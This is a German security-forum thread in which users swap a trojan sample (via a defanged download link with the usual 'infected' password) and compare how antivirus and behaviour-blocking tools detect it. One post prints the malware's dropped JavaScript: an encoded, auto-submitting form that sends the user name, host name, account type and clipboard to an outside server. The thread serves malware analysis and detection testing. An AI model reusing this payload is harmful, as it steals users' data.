Uploadergebnisse v-total + jotti, viel spass :) Einstellungen

[Gast_kurz-pc_*]

Es gibt noch Virscan. Er hat die Core Engine von a²
Hier wurde schon darüber gesprochen

Kenne ich allerdings ist der oft sehr Langsam.

[citro]

TrendMicro ist jetzt wider bei VirusTotal Vertreten.
http://blog.hispasec.com/virustotal/31

Hoffentlich kommt bald auch a-squared dazu.

habe mal im emsisoft-forum einen Link gefunden, schon ziemlich alt, sieht nicht so aus als würde es mit VT funktionieren

Klick

[Rios]

Hier einer aus der Oase der bösen

[Julian]

Mal wieder ein Trojaner gefällig ?
Habe z.Z. Vista 64 mit AntiVir Premium und Comodo am laufen. AntiVir hat wirklich nichts gefunden, Comodo hat aber gemeckert, dass das Sample an verschiedenen stellen eine "smss.exe" droppen und diese dann starten wollte.
[attachment=3747:vir.jpg]

Da sieht man wieder, wie beschränkt und damit letzten Endes wirkungslos herkömmliche AV-Lösungen sein können.
Ich kann das Teil leider nicht mit dem HIPS von KIS prüfen, da Kaspersky bereits eine Signatur in petto hat und das Programm so unabhängig von der Dateianalyse einen Risikoindex von 100 bekommt.
Bietet sich wer an, das Teil mit AntiBot oder anderen Verhaltensblockern zu testen?

[Voyager]

Ja gibma her...

[Julian]

hxxp://rapidshare.de/files/39794107/WUPH.7z.html

Das Passwort ist, wie üblich, "infected".

[Julian]

Betahotfix scheint das Laden von neuen Signaturen vom Hauptserver zu verhindern, naja. Wenigstens kann ich so das Sample mit dem HIPS testen:
Hier eine kleine Bildserie:
[attachment=3748:hips1.jpg] [attachment=3749:hips2.jpg]
[attachment=3750:hips3.jpg] [attachment=3751:hips4.jpg]
[attachment=3752:task.jpg]
Der Prozess läuft nach dem Blocken diverser Aktivitäten nur noch im Leerlauf mit.

Schon böseres Zeug gesehen...

[Rios]

 Magical_Snap___2008.06.22_16.33___001.png ( 2.24KB ) Anzahl der Downloads: 27
Ist übrigens sehr jung. So etwas nennt man Reaktionszeit.

[Gast_rock_*]

n'abend...

@ evil

mc afee heuristik meint es ist/kann ein keylogger.... sein...

heuristic detection |beav-vb keylogger |Trojan

die ergebnisse bei den onlinescanner sind schwach...nur kaspersky und fortinet.... von daher....seltsam...

[Voyager]

wird erkannt , das Teil hat einfach zuviele bösartige Aktionen auf Lager die gegen eine ganze Reihe der Antibot Regeln verstösst.

Angehängte Datei(en)

 Zwischenablage.jpg ( 134.27KB ) Anzahl der Downloads: 26

 

[Julian]

n'abend...

@ evil

mc afee heuristik meint es ist/kann ein keylogger.... sein...

heuristic detection |beav-vb keylogger |Trojan

die ergebnisse bei den onlinescanner sind schwach...nur kaspersky und fortinet.... von daher....seltsam...

Da liegt die Heuristik von McAfee anscheinend richtig. Dass so wenige Scanner das Sample signaturbasierend erkennen liegt wohl daran, dass es noch ziemlich neu ist (wie der Screen von Rios ja auch zeigt).
Das NAB was findet ist positiv, überrascht mich aber nicht

[Gast_rock_*]

mc afee is ja nu nicht schlecht

hmm... fortinet hat überhaupt eine exotische erkennung.... hab schon oft sachen gehabt die nur von fortinet oder einem anderen erkannt wurden...hab die meistens deshalb "weggeworfen".... jetzt werd ich in so einzelfällen aufpassen!

[Voyager]

Dass so wenige Scanner das Sample signaturbasierend erkennen liegt wohl daran, dass es noch ziemlich neu ist (wie der Screen von Rios ja auch zeigt).

Ich denke das liegt eher daran weil die Scanner diese smss.exe aus dem Installer nicht extrahieren können.

[Gast_Xeon_*]

hxxp://rapidshare.de/files/39794107/WUPH.7z.html

Das Ding ist unter Vista gar nicht lauffähig.

[Voyager]

@Xeon

Da wäre ich mir an deiner Stelle nicht so sicher, genau das ist nur eine Fake Meldung ! die auch unter XP erscheint um den User zu täuschen das Programm sei nicht lauffähig und trotzdem startet sich die SMSS im Userverzeichnis Startmenüordner , hier wird Vista nur unter Umständen eine UAC Meldung bringen wenn das Rootkit eine administrative Schreibberechtigung anfordert.
Gleich mal mit Vista testen...

Da isse
C:\Users\Test\AppData\Roaming\Microsoft\Windows\Start Menu\smss.exe

Der Installer erstellt auch eine HTML Datei im Startmenü , wenn man diese aufruft soll ein ActiveX ausgeführt werden.

<script language=JavaScript>mik='%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Cform%20method%3D%22POST%22%20action%3D%22%0D%0A%22%20name%3D%22form1%22%3E%0D%0A%20%20%3Cp%3E%0D%0A%20%20%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T1%22%20size%3D%2220%22%20%0D%0Avalue%3D%22To%22%3E%3Cinput%20%0D%0Atype%3D%22hidden%22%20name%3D%22T2%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Test%60%3E%3Cinput%20%0D%0Atype%3D%22hidden%22%20%0D%0Aname%3D%22T3%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60TEST-PC@gurushop.com%60%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22T4%22%20%0D%0Asize%3D%2220%22%20value%3D%22Subject%22%3E%3C/p%3E%0D%0A%20%20%3Cp%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T5%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Test%60%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22T6%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60TEST-PC%60%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22T7%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Batch%60%3E%3Cinput%20%0D%0Atype%3D%22hidden%22%20%0D%0Aname%3D%22T8%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Cyber%60%3E%3C/p%3E%0D%0A%20%20%3Cp%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T9%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Administrator%60%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T10%22%20size%3D%2220%22%20%0D%0A%20value%3D%60Mudi%60%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T21%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60http%3A//9down.pcriot.com/guru/Insert.php%60%3E%3C/p%3E%0D%0A%20%20%3Cp%3E%3Ctextarea%20%0D%0Arows%3D%221%22%20%0D%0Aname%3D%22S1%22%20%0D%0Acols%3D%221%22%3E%0D%0APCUSER%20%3A%20Test%0D%0APCHOST%20%3A%20TEST-PC%0D%0AAcct%20Type%20%3A%20Administrator%0D%0AAdmin%20%3A%20Mudi%0D%0ASerial%20%3A%20Cyber%0D%0ABatch%20%3A%20Batch%0D%0A%0D%0A%0D%0A%0D%0ACLIPBOARD%20%3A%20%0D%0A%3C/textarea%3E%3C/p%3E%0D%0A%3C/form%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E%0D%0A';duk=unescape(mik);document.write(duk);</script><script language='javascript'>document.form1.submit()</script>

Der Beitrag wurde von bond7 bearbeitet: 22.06.2008, 16:35

[chris30duew]

Da hat bond recht es erscheint auch bei XP und dennoch startet smss laut tastmanager.
Was mich irgendwie etwas erschüttert, das F-secure 2009 nicht den geringsten mucks macht, weder der AV noch die Heuristik noch und das ist eigentlich am traurigsten, weil ja dafür eigentlich da, deepguard.
Zumindest hätte ich mal so ne reaktion wie bei Antibot erwartet, oder das zumindest mal irgend ne warnung kommt über einen verbotenen prozess oder so....
Nix passiert. die smss.exe läuft vor sich hin, f-secure, deepguard macht keinen mucks


wird hiermit wieder deinstalliert, denn für was brauch ich eine proaktive erkennung wie deepguard die nicht anspricht

[Gast_Nightwatch_*]

Zumindest hätte ich mal so ne reaktion wie bei Antibot erwartet, oder das zumindest mal irgend ne warnung kommt über einen verbotenen prozess oder so....
Nix passiert. die smss.exe läuft vor sich hin, f-secure, deepguard macht keinen mucks

Hey Chris!

Bin gerade nicht zuhause und werde das Sample erst nachher testen können. Wie war/ist Deepguard bei Dir konfiguriert? Auf welchem OS hast Du die Datei ausgeführt?

[chris30duew]

hey nightwatch

deepguard war so wie intalliert. also der haken für die leistungsverbesserung und nachfragen oder so. also erster und dritter haken war drin eben so wie installiert.
ich wüsste auch nicht das ich auch noch an den deepguard hand anlegen muss um geschützt zu sein, grad das soll ja nicht der fall sein, da er ja vor unbekanntem schützen soll.
ich habs auf winxp sp3 getestet

kannst ja auch mal versuchen wenn du at home bist

gruss chris

[Gast_Nightwatch_*]

ich wüsste auch nicht das ich auch noch an den deepguard hand anlegen muss um geschützt zu sein, grad das soll ja nicht der fall sein, da er ja vor unbekanntem schützen soll.
ich habs auf winxp sp3 getestet

Ok, danke Dir!

Hatte nur gefragt, damit ich das unter gleichen Umständen testen kann. Leider besitze ich aber nur noch Vista-Oberflächen.

Trotzdem noch schnell zwei Fragen:

1.) Gehe ich richtig in der Annahme, dass Du das Technology-Preview auf dem Rechner hast? (ISTP)
2.) Leistungsoptimiert...meinst Du damit a) die Einstellungsmöglichkeit unter der Systemsteuerung Verbindungen zum Server herzustellen (siehe Bild) :


oder b) die Einstellung des gesamten AntiVirus/Antispy-Schutzes ? (folgendes Bild) :




Grüße
Nightwatch

Der Beitrag wurde von Nightwatch bearbeitet: 22.06.2008, 17:01

[Gast_Xeon_*]

@Xeon

Da wäre ich mir an deiner Stelle nicht so sicher, genau das ist nur eine Fake Meldung ! die auch unter XP erscheint um den User zu täuschen das Programm sei nicht lauffähig und trotzdem startet sich die SMSS im Userverzeichnis Startmenüordner....

Hast recht,jetzt hab ich es auch gesehen.....